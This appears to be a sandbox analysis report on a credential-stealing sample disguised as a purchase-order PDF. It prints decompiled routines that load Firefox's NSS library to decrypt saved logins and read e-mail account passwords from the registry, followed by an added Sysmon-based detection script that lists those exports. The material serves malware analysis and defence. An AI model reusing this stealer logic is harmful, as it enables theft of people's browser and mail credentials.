                                                  						// Resolve the NSS entry points needed to decrypt Firefox's saved logins into _t69[1..7]:
                                                  						// NSS_Init on the profile directory, PK11_GetInternalKeySlot / PK11_CheckUserPassword /
                                                  						// PK11_Authenticate to unlock the key slot (master password, if set), and PK11SDR_Decrypt
                                                  						// for the encrypted username and password fields. This is the WebBrowserPassView component
                                                  						// the summary signatures refer to.
                                                  						_t69[1] = GetProcAddress( *_t69, "NSS_Init");
                                                  						_t69[2] = GetProcAddress( *_t69, "NSS_Shutdown");
                                                  						_t69[3] = GetProcAddress( *_t69, "PK11_GetInternalKeySlot");
                                                  						_t69[4] = GetProcAddress( *_t69, "PK11_FreeSlot");
                                                  						_t69[5] = GetProcAddress( *_t69, "PK11_CheckUserPassword");
                                                  						_t69[6] = GetProcAddress( *_t69, "PK11_Authenticate");
                                                  						_t69[7] = GetProcAddress( *_t69, "PK11SDR_Decrypt");
                                                  					} else {
                                                  						// flag 8 = LOAD_WITH_ALTERED_SEARCH_PATH: dependencies are searched relative to the DLL's own
                                                  						// directory rather than the process image; _t44 is 0 here (hFile is reserved)
                                                  						_t53 = LoadLibraryExA( &_v532, _t44, 8);
                                                  						 *_t69 = _t53;
                                                  						if(_t53 != 0) {
                                                  							goto L9;
                                                  						} else {
                                                  							E0040DEA9();
                                                  							_t56 = LoadLibraryExA( &_v532, 0, 8);
                                                  							 *_t69 = _t56;
                                                  							if(_t56 != 0) {
                                                  								goto L9;
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				return 0 |  *_t69 != 0x00000000;
                                                  			}
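
                                                  The two routines above leave host telemetry that is easier to act on than the fuzzy hashes: E0040DEEE maps nss3.dll from the Firefox install directory into a process that is not Firefox, and the MailPassView window procedure deletes HKCU\Software\NirSoft\MailPassView when started with /noloadsettings. The script below is an added example, not code from the sample, from NirSoft or from the sandbox report. It scores processes on Sysmon-style Event ID 7 (ImageLoad) and Event ID 12 (RegistryEvent) records; the field names follow Sysmon, while the sample events, the Mozilla allow-list and the loader paths are constructed assumptions for the example.

```python
"""Host-side detection for the credential-recovery components in this sample.

Added example; not code from the sample, from NirSoft, or from the sandbox
report. E0040DEEE loads nss3.dll from a Firefox install directory and
resolves the NSS/PK11 exports used to decrypt saved logins, and the
MailPassView window procedure deletes HKCU\\Software\\NirSoft\\MailPassView
when started with /noloadsettings. Both leave host telemetry. Field names
below follow Sysmon Event ID 7 (ImageLoad) and Event ID 12 (RegistryEvent);
the sample events and the Mozilla allow-list are constructed assumptions.
"""
from __future__ import annotations

import ntpath
from collections import defaultdict
from dataclasses import dataclass
from typing import Iterable, Union

# Exports resolved by E0040DEEE (_t69[1..7]); a binary that resolves this set
# is set up to call PK11SDR_Decrypt on Firefox's saved logins.
NSS_EXPORTS = frozenset({
    "NSS_Init", "NSS_Shutdown", "PK11_GetInternalKeySlot", "PK11_FreeSlot",
    "PK11_CheckUserPassword", "PK11_Authenticate", "PK11SDR_Decrypt",
})

# Processes expected to load nss3.dll. Assumption; extend per environment.
MOZILLA_LOADERS = frozenset({"firefox.exe", "thunderbird.exe", "plugin-container.exe"})

# Registry path the embedded NirSoft tool creates/deletes (RegDeleteKeyA above).
NIRSOFT_KEY_FRAGMENT = "\\software\\nirsoft\\"


@dataclass(frozen=True)
class ImageLoad:
    """Subset of Sysmon Event ID 7."""
    process_id: int
    image: str          # loading process
    image_loaded: str   # DLL path


@dataclass(frozen=True)
class RegistryEvent:
    """Subset of Sysmon Event ID 12."""
    process_id: int
    image: str
    event_type: str     # "CreateKey" or "DeleteKey"
    target_object: str


Event = Union[ImageLoad, RegistryEvent]


def nss_loaded_by_foreign_process(ev: ImageLoad) -> bool:
    """nss3.dll mapped into something that is not a Mozilla product.

    E0040DEEE switches into the Firefox directory and calls LoadLibraryExA with
    LOAD_WITH_ALTERED_SEARCH_PATH, so ImageLoaded sits under the Firefox
    install while Image is the stealer (or the host it was hollowed into).
    """
    if ntpath.basename(ev.image_loaded).lower() != "nss3.dll":
        return False
    return ntpath.basename(ev.image).lower() not in MOZILLA_LOADERS


def nirsoft_registry_touch(ev: RegistryEvent) -> bool:
    """Key create/delete under Software\\NirSoft (HKCU or HKU\\<sid> form)."""
    return NIRSOFT_KEY_FRAGMENT in ev.target_object.lower()


def score_processes(events: Iterable[Event]) -> dict[int, list[str]]:
    """Collect findings per PID. Two independent findings on one PID (NSS load
    plus NirSoft registry activity) is the high-confidence case; a lone NSS
    load still deserves a look, since any non-Mozilla loader is unusual."""
    findings: dict[int, list[str]] = defaultdict(list)
    for ev in events:
        if isinstance(ev, ImageLoad) and nss_loaded_by_foreign_process(ev):
            findings[ev.process_id].append(f"nss3.dll loaded by {ev.image}")
        elif isinstance(ev, RegistryEvent) and nirsoft_registry_touch(ev):
            findings[ev.process_id].append(f"{ev.event_type} {ev.target_object}")
    return dict(findings)


# Constructed sample telemetry, not taken from the report.
SAMPLE_EVENTS: list[Event] = [
    ImageLoad(4120, r"C:\Program Files\Mozilla Firefox\firefox.exe",
              r"C:\Program Files\Mozilla Firefox\nss3.dll"),
    ImageLoad(5532, r"C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe",
              r"C:\Program Files\Mozilla Firefox\nss3.dll"),
    RegistryEvent(5532, r"C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe",
                  "DeleteKey", r"HKU\S-1-5-21-111\Software\NirSoft\MailPassView"),
    RegistryEvent(900, r"C:\Windows\explorer.exe", "CreateKey",
                  r"HKU\S-1-5-21-111\Software\Microsoft\Windows\CurrentVersion\Explorer"),
]


if __name__ == "__main__":
    for pid, hits in sorted(score_processes(SAMPLE_EVENTS).items()):
        print(pid, *hits, sep="\n  ")
```

Because the sample injects into another process (see the hollowing signatures in the summary), the Image in the real event may be a legitimate-looking host rather than the dropped file; the rule keys on the loaded module and the registry path, not on the loader's name, for that reason. NSS_EXPORTS is kept as a separate constant because the same seven names are a useful pivot for static string scans of other droppers that bundle this component.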

                                                  [Per-line instruction address column for E0040DEEE (0x0040deee to 0x0040e053) omitted: it was aligned to the C-Code listing above and carries no information once separated from it.]

                                                  APIs
                                                  • memset.MSVCRT ref: 0040DF0F
                                                  • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040DF3E
                                                  • SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040DF4B
                                                  • memset.MSVCRT ref: 0040DF62
                                                  • strlen.MSVCRT ref: 0040DF6C
                                                  • strlen.MSVCRT ref: 0040DF7A
                                                  • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040DFB3
                                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFCF
                                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFE7
                                                  • GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040DFFC
                                                  • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E008
                                                  • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E014
                                                  • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E020
                                                  • GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E02C
                                                  • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E038
                                                  • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040E044
                                                    • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                    • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$strlen$CurrentDirectoryLibraryLoadmemset$HandleModulememcpy
                                                  • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                  • API String ID: 1296682400-4029219660
                                                  • Opcode ID: bee48e1ba3e59cf5a7585e4159a10cf2e8eb6bd81037002e4d6a425fcc2e4864
                                                  • Instruction ID: fea3831f464983b0eef39fbf9020f470c327cc413978f8e1f023dd725517e53d
                                                  • Opcode Fuzzy Hash: bee48e1ba3e59cf5a7585e4159a10cf2e8eb6bd81037002e4d6a425fcc2e4864
                                                  • Instruction Fuzzy Hash: 2A4187B1940309AACB20AF75CC49FC6BBF8AF64704F10496AE185E2191E7B996D4CF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 35%
                                                  			E00402606(void* __ecx, void* __fp0) {
                                                  				void* __esi;
                                                  				void* _t58;
                                                  				void* _t59;
                                                  				void* _t67;
                                                  				void* _t70;
                                                  				void* _t73;
                                                  				void* _t87;
                                                  				signed int _t90;
                                                  				void* _t92;
                                                  				signed int _t96;
                                                  				intOrPtr _t100;
                                                  				intOrPtr _t101;
                                                  				void* _t103;
                                                  				void* _t105;
                                                  				void* _t106;
                                                  				void* _t108;
                                                  				void* _t114;
                                                  
                                                  				_t114 = __fp0;
                                                  				_t92 = __ecx;
                                                  				_t103 = _t105 - 0x6c;
                                                  				_t106 = _t105 - 0x474;
                                                  				 *(_t103 + 0x4c) = "POP3 User Name";
                                                  				 *(_t103 + 0x50) = "IMAP User Name";
                                                  				 *(_t103 + 0x54) = "HTTPMail User Name";
                                                  				 *(_t103 + 0x58) = "SMTP USer Name";
                                                  				 *(_t103 + 0x1c) = "POP3 Server";
                                                  				 *(_t103 + 0x20) = "IMAP Server";
                                                  				 *(_t103 + 0x24) = "HTTPMail Server";
                                                  				 *(_t103 + 0x28) = "SMTP Server";
                                                  				 *(_t103 + 0x3c) = "POP3 Password2";
                                                  				 *(_t103 + 0x40) = "IMAP Password2";
                                                  				 *(_t103 + 0x44) = "HTTPMail Password2";
                                                  				 *(_t103 + 0x48) = "SMTP Password2";
                                                  				 *(_t103 + 0x2c) = "POP3 Port";
                                                  				 *(_t103 + 0x30) = "IMAP Port";
                                                  				 *(_t103 + 0x34) = "HTTPMail Port";
                                                  				 *(_t103 + 0x38) = "SMTP Port";
                                                  				 *(_t103 + 0x5c) = "POP3 Secure Connection";
                                                  				 *(_t103 + 0x60) = "IMAP Secure Connection";
                                                  				 *(_t103 + 0x64) = "HTTPMail Secure Connection";
                                                  				 *(_t103 + 0x68) = "SMTP Secure Connection";
                                                  				_t90 = 0;
                                                  				do {
                                                  					 *(_t103 - 0x64) = 0;
                                                  					memset(_t103 - 0x63, 0, 0x7f);
                                                  					_push(_t103 - 0x64);
                                                  					_t96 = _t90 << 2;
                                                  					_push( *((intOrPtr*)(_t103 + _t96 + 0x4c)));
                                                  					_push( *((intOrPtr*)(_t103 + 0x78)));
                                                  					_t58 = 0x7f;
                                                  					_t59 = E0040EB80(_t58, _t92);
                                                  					_t106 = _t106 + 0x18;
                                                  					if(_t59 == 0) {
                                                  						E004021D8(_t103 - 0x408);
                                                  						strcpy(_t103 - 0x1f4, _t103 - 0x64);
                                                  						_t100 =  *((intOrPtr*)(_t103 + 0x78));
                                                  						 *((intOrPtr*)(_t103 - 0x37c)) =  *((intOrPtr*)(_t103 + 0x7c));
                                                  						_t34 = _t90 + 1; // 0x1
                                                  						 *((intOrPtr*)(_t103 - 0x1f8)) = _t34;
                                                  						_push(_t103 - 0x2f8);
                                                  						_push( *((intOrPtr*)(_t103 + _t96 + 0x1c)));
                                                  						_push(_t100);
                                                  						_t67 = 0x7f;
                                                  						E0040EB80(_t67, _t92);
                                                  						_push(_t103 - 0x3fc);
                                                  						_push("SMTP Display Name");
                                                  						_push(_t100);
                                                  						_t70 = 0x7f;
                                                  						E0040EB80(_t70, _t92);
                                                  						_push(_t103 - 0x378);
                                                  						_push("SMTP Email Address");
                                                  						_push(_t100);
                                                  						_t73 = 0x7f;
                                                  						E0040EB80(_t73, _t92);
                                                  						_t108 = _t106 + 0x2c;
                                                  						if(_t90 != 3) {
                                                  							_push(_t103 - 0x278);
                                                  							_push("SMTP Server");
                                                  							_push(_t100);
                                                  							_t87 = 0x7f;
                                                  							E0040EB80(_t87, _t92);
                                                  							_t108 = _t108 + 0xc;
                                                  						}
                                                  						E0040EB59(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x2c)), _t103 - 0x74);
                                                  						E0040EB59(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x5c)), _t103 - 0x70);
                                                  						_t106 = _t108 + 0x18;
                                                  						_t101 =  *((intOrPtr*)(_t103 + 0x74));
                                                  						E0040246C(_t101, _t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x3c)), _t103 - 0x174, 0);
                                                  						strcpy(_t103 - 0xf4, _t101 + 0xa9c);
                                                  						_pop(_t92);
                                                  						_t59 = E00402407(_t103 - 0x408, _t114, _t101);
                                                  					}
                                                  					_t90 = _t90 + 1;
                                                  				} while (_t90 < 4);
                                                  				return _t59;
                                                  			}

                                                  APIs
                                                  • memset.MSVCRT ref: 004026AE
                                                    • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                  • strcpy.MSVCRT(?,?,?,?,?,75D6ED80,?,00000000), ref: 004026EC
                                                  • strcpy.MSVCRT(?,?), ref: 004027A9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strcpy$QueryValuememset
                                                  • String ID: HTTPMail Password2$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP Password2$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3 Password2$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$SMTP Display Name$SMTP Email Address$SMTP Password2$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                  • API String ID: 3373037483-1627711381
                                                  • Opcode ID: 5eb0fa372559596e0b4073e661d7cf54bc2e6271f7b91ab53abef14ebe38c6bd
                                                  • Instruction ID: d93c2979c5964ee18a3e8d610d8756237e52e0a5809c5516356d8c5187ea57d6
                                                  • Opcode Fuzzy Hash: 5eb0fa372559596e0b4073e661d7cf54bc2e6271f7b91ab53abef14ebe38c6bd
                                                  • Instruction Fuzzy Hash: E04186B190021CAADB10DF91DE49ADE37B8EF04348F10446BFD18E7191D3B89699CF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 97%
                                                  			E004027D0(void* __fp0) {
                                                  				void* __esi;
                                                  				void* _t66;
                                                  				signed int _t92;
                                                  				void* _t95;
                                                  				intOrPtr _t109;
                                                  				void* _t111;
                                                  				void* _t113;
                                                  				void* _t114;
                                                  				void* _t121;
                                                  
                                                  				_t121 = __fp0;
                                                  				_t111 = _t113 - 0x70;
                                                  				_t114 = _t113 - 0x474;
                                                  				 *(_t111 + 0x40) = "POP3 Password";
                                                  				 *(_t111 + 0x44) = "IMAP Password";
                                                  				 *(_t111 + 0x48) = "HTTP Password";
                                                  				 *(_t111 + 0x4c) = "SMTP Password";
                                                  				 *(_t111 + 0x50) = "POP3 User";
                                                  				 *(_t111 + 0x54) = "IMAP User";
                                                  				 *(_t111 + 0x58) = "HTTP User";
                                                  				 *(_t111 + 0x5c) = "SMTP User";
                                                  				 *(_t111 + 0x20) = "POP3 Server";
                                                  				 *(_t111 + 0x24) = "IMAP Server";
                                                  				 *(_t111 + 0x28) = "HTTP Server URL";
                                                  				 *(_t111 + 0x2c) = "SMTP Server";
                                                  				 *(_t111 + 0x30) = "POP3 Port";
                                                  				 *(_t111 + 0x34) = "IMAP Port";
                                                  				 *(_t111 + 0x38) = "HTTP Port";
                                                  				 *(_t111 + 0x3c) = "SMTP Port";
                                                  				 *(_t111 + 0x60) = "POP3 Use SPA";
                                                  				 *(_t111 + 0x64) = "IMAP Use SPA";
                                                  				 *(_t111 + 0x68) = "HTTPMail Use SSL";
                                                  				 *(_t111 + 0x6c) = "SMTP Use SSL";
                                                  				_t92 = 0;
                                                  				do {
                                                  					 *(_t111 - 0x60) = 0;
                                                  					memset(_t111 - 0x5f, 0, 0x7f);
                                                  					_t114 = _t114 + 0xc;
                                                  					_t100 = _t92 << 2;
                                                  					_t66 = E004029A7(_t111 - 0x60,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + (_t92 << 2) + 0x50)));
                                                  					if(_t66 != 0) {
                                                  						E004021D8(_t111 - 0x404);
                                                  						strcpy(_t111 - 0x1f0, _t111 - 0x60);
                                                  						_pop(_t95);
                                                  						 *((intOrPtr*)(_t111 - 0x378)) =  *((intOrPtr*)( *((intOrPtr*)(_t111 + 0x78)) + 0xb1c));
                                                  						_t37 = _t92 + 1; // 0x1
                                                  						 *((intOrPtr*)(_t111 - 0x1f4)) = _t37;
                                                  						E004029A7(_t111 - 0x2f4,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x20)));
                                                  						E004029A7(_t111 - 0x3f8,  *((intOrPtr*)(_t111 + 0x7c)), "Display Name");
                                                  						E004029A7(_t111 - 0x374,  *((intOrPtr*)(_t111 + 0x7c)), "Email");
                                                  						if(_t92 != 3) {
                                                  							E004029A7(_t111 - 0x274,  *((intOrPtr*)(_t111 + 0x7c)), "SMTP Server");
                                                  							E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)), "SMTP Port", _t111 - 0x68);
                                                  							_t114 = _t114 + 0xc;
                                                  						}
                                                  						E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x30)), _t111 - 0x70);
                                                  						E0040EB59(_t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x60)), _t111 - 0x6c);
                                                  						_t109 =  *((intOrPtr*)(_t111 + 0x78));
                                                  						_t114 = _t114 + 0x18;
                                                  						E0040246C(_t109, _t95,  *((intOrPtr*)(_t111 + 0x7c)),  *((intOrPtr*)(_t111 + _t100 + 0x40)), _t111 - 0x170, 1);
                                                  						strcpy(_t111 - 0xf0, _t109 + 0xa9c);
                                                  						_t66 = E00402407(_t111 - 0x404, _t121, _t109);
                                                  					}
                                                  					_t92 = _t92 + 1;
                                                  				} while (_t92 < 4);
                                                  				return _t66;
                                                  			}

                                                  APIs
                                                  • memset.MSVCRT ref: 00402878
                                                    • Part of subcall function 004029A7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029E9
                                                  • strcpy.MSVCRT(?,?,75D6ED80,?,00000000), ref: 004028B2
                                                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,75D6ED80,?,00000000), ref: 00402980
                                                    • Part of subcall function 0040EB59: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402945,?,?,?,?,00402945,?,?), ref: 0040EB78
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strcpy$ByteCharMultiQueryValueWidememset
                                                  • String ID: Display Name$Email$HTTP Password$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP Password$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3 Password$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$SMTP Password$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                  • API String ID: 2416467034-4086712241
                                                  • Opcode ID: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                  • Instruction ID: 2a04afc1b401ca52673312b513a052c1616a462ab9372f8060d899744f0eb97e
                                                  • Opcode Fuzzy Hash: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                  • Instruction Fuzzy Hash: FF513EB150025DABCF24DF61DE499DD7BB8FF04308F10416AF924A6191D3B999A9CF88
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 81%
                                                  			E0040F435(CHAR* __eax) {
                                                  				void* _v8;
                                                  				int _v12;
                                                  				void _v267;
                                                  				char _v268;
                                                  				void _v531;
                                                  				char _v532;
                                                  				void _v787;
                                                  				char _v788;
                                                  				void _v1051;
                                                  				char _v1052;
                                                  				void _v2075;
                                                  				char _v2076;
                                                  				void* __esi;
                                                  				void* _t45;
                                                  				void* _t59;
                                                  				char* _t60;
                                                  				char* _t71;
                                                  				char* _t75;
                                                  				void* _t84;
                                                  				CHAR* _t89;
                                                  				void* _t90;
                                                  				void* _t91;
                                                  				void* _t92;
                                                  				void* _t93;
                                                  
                                                  				_t89 = __eax;
                                                  				_v1052 = 0;
                                                  				memset( &_v1051, 0, 0x104);
                                                  				_v788 = 0;
                                                  				memset( &_v787, 0, 0xff);
                                                  				 *_t89 = 0;
                                                  				_t45 = E0040EB3F(0x80000002, "SOFTWARE\\Mozilla",  &_v8);
                                                  				_t91 = _t90 + 0x24;
                                                  				if(_t45 != 0) {
                                                  					L12:
                                                  					strcpy(_t89,  &_v1052);
                                                  					if( *_t89 == 0) {
                                                  						ExpandEnvironmentStringsA("%programfiles%\\Mozilla Thunderbird", _t89, 0x104);
                                                  						if(E0040F3BA(_t89) == 0) {
                                                  							 *_t89 = 0;
                                                  						}
                                                  						if( *_t89 == 0) {
                                                  							E00406172(_t89);
                                                  							if(E0040F3BA(_t89) == 0) {
                                                  								 *_t89 = 0;
                                                  							}
                                                  							if( *_t89 == 0) {
                                                  								GetCurrentDirectoryA(0x104, _t89);
                                                  								if(E0040F3BA(_t89) == 0) {
                                                  									 *_t89 = 0;
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  					return 0 |  *_t89 != 0x00000000;
                                                  				} else {
                                                  					_v268 = 0;
                                                  					memset( &_v267, 0, 0xff);
                                                  					_v12 = 0;
                                                  					_t59 = E0040EC05(_v8, 0,  &_v268);
                                                  					_t92 = _t91 + 0x18;
                                                  					while(_t59 == 0) {
                                                  						_push(7);
                                                  						_t60 =  &_v268;
                                                  						_push("mozilla");
                                                  						_push(_t60);
                                                  						L00411642();
                                                  						_t93 = _t92 + 0xc;
                                                  						if(_t60 == 0) {
                                                  							_v532 = 0;
                                                  							memset( &_v531, 0, 0x104);
                                                  							_v2076 = 0;
                                                  							memset( &_v2075, 0, 0x3ff);
                                                  							_push( &_v268);
                                                  							_push("%s\\bin");
                                                  							_push(0x3ff);
                                                  							_push( &_v2076);
                                                  							L00411648();
                                                  							E0040EBC1(_t84, _v8,  &_v2076, "PathToExe",  &_v532, 0x104);
                                                  							_t71 =  &_v532;
                                                  							_push(0x5c);
                                                  							_push(_t71);
                                                  							L0041164E();
                                                  							_t93 = _t93 + 0x44;
                                                  							if(_t71 != 0) {
                                                  								 *_t71 = 0;
                                                  							}
                                                  							if(_v532 != 0 && E0040F3BA( &_v532) != 0) {
                                                  								_push( &_v788);
                                                  								_t75 =  &_v268;
                                                  								L004115C4();
                                                  								_t84 = _t75;
                                                  								if(_t75 > 0) {
                                                  									strcpy( &_v1052,  &_v532);
                                                  									strcpy( &_v788,  &_v268);
                                                  									_t93 = _t93 + 0x10;
                                                  								}
                                                  							}
                                                  						}
                                                  						_v12 = _v12 + 1;
                                                  						_t59 = E0040EC05(_v8, _v12,  &_v268);
                                                  						_t92 = _t93 + 0xc;
                                                  					}
                                                  					RegCloseKey(_v8);
                                                  					goto L12;
                                                  				}
                                                  			}

                                                  APIs
                                                  • memset.MSVCRT ref: 0040F459
                                                  • memset.MSVCRT ref: 0040F471
                                                    • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                  • memset.MSVCRT ref: 0040F4A9
                                                    • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                  • _mbsnbicmp.MSVCRT ref: 0040F4D7
                                                  • memset.MSVCRT ref: 0040F4F6
                                                  • memset.MSVCRT ref: 0040F50E
                                                  • _snprintf.MSVCRT ref: 0040F52B
                                                  • _mbsrchr.MSVCRT ref: 0040F555
                                                  • _mbsicmp.MSVCRT ref: 0040F589
                                                  • strcpy.MSVCRT(?,?,?), ref: 0040F5A2
                                                  • strcpy.MSVCRT(?,?,?,?,?), ref: 0040F5B5
                                                  • RegCloseKey.ADVAPI32(0040F699), ref: 0040F5E0
                                                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F5EE
                                                  • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,00000000), ref: 0040F600
                                                  • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F62D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$strcpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
                                                  • String ID: %programfiles%\Mozilla Thunderbird$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                                  • API String ID: 3269028891-3267283505
                                                  • Opcode ID: 53b4df83feeff12aad6ea8c9c33e414d6f76a23fb296a6d720f7d1efbd9f2591
                                                  • Instruction ID: bd4ffbb0b4c73fbe97c341744dc0c87608cd01b58ef3e3991875b3aaf34b88fb
                                                  • Opcode Fuzzy Hash: 53b4df83feeff12aad6ea8c9c33e414d6f76a23fb296a6d720f7d1efbd9f2591
                                                  • Instruction Fuzzy Hash: 5251A77284425DBADB31D7A18C46EDA7ABC9F14344F0404FBF645E2152EA788FC98B68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 95%
                                                  			E0040F126(void* __edi, char* _a4, char* _a8) {
                                                  				int _v8;
                                                  				void _v263;
                                                  				char _v264;
                                                  				void _v519;
                                                  				char _v520;
                                                  				intOrPtr _t32;
                                                  				void* _t58;
                                                  				char* _t60;
                                                  				void* _t61;
                                                  				void* _t62;
                                                  
                                                  				_t58 = __edi;
                                                  				_v264 = 0;
                                                  				memset( &_v263, 0, 0xfe);
                                                  				_v520 = 0;
                                                  				memset( &_v519, 0, 0xfe);
                                                  				_t62 = _t61 + 0x18;
                                                  				_v8 = 1;
                                                  				if( *((intOrPtr*)(__edi + 4)) == 0xffffffff &&  *((intOrPtr*)(__edi + 8)) <= 0) {
                                                  					_v8 = 0;
                                                  				}
                                                  				_t60 = _a4;
                                                  				 *_t60 = 0;
                                                  				if(_v8 != 0) {
                                                  					strcpy(_t60, "<font");
                                                  					_t32 =  *((intOrPtr*)(_t58 + 8));
                                                  					if(_t32 > 0) {
                                                  						sprintf( &_v264, " size=\"%d\"", _t32);
                                                  						strcat(_t60,  &_v264);
                                                  						_t62 = _t62 + 0x14;
                                                  					}
                                                  					_t33 =  *((intOrPtr*)(_t58 + 4));
                                                  					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
                                                  						sprintf( &_v264, " color=\"#%s\"", E0040F071(_t33,  &_v520));
                                                  						strcat(_t60,  &_v264);
                                                  					}
                                                  					strcat(_t60, ">");
                                                  				}
                                                  				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                  					strcat(_t60, "<b>");
                                                  				}
                                                  				strcat(_t60, _a8);
                                                  				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                  					strcat(_t60, "</b>");
                                                  				}
                                                  				if(_v8 != 0) {
                                                  					strcat(_t60, "</font>");
                                                  				}
                                                  				return _t60;
                                                  			}

                                                  APIs
                                                  • memset.MSVCRT ref: 0040F147
                                                  • memset.MSVCRT ref: 0040F15B
                                                  • strcpy.MSVCRT(?,<font,?,?,?,?,?), ref: 0040F188
                                                  • sprintf.MSVCRT ref: 0040F1A3
                                                  • strcat.MSVCRT(?,?,?, size="%d",?,?,?,?,?,?), ref: 0040F1B0
                                                  • sprintf.MSVCRT ref: 0040F1DA
                                                  • strcat.MSVCRT(?,?,?, color="#%s",00000000,?,?,?,?,?,?,?), ref: 0040F1E7
                                                  • strcat.MSVCRT(?,00413DF4,?,?,?,?,?), ref: 0040F1F5
                                                  • strcat.MSVCRT(?,<b>,?,?,?,?,?), ref: 0040F207
                                                  • strcat.MSVCRT(?,00409631,?,?,?,?,?), ref: 0040F212
                                                  • strcat.MSVCRT(?,</b>,?,?,?,?,?), ref: 0040F224
                                                  • strcat.MSVCRT(?,</font>,?,?,?,?,?), ref: 0040F236
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
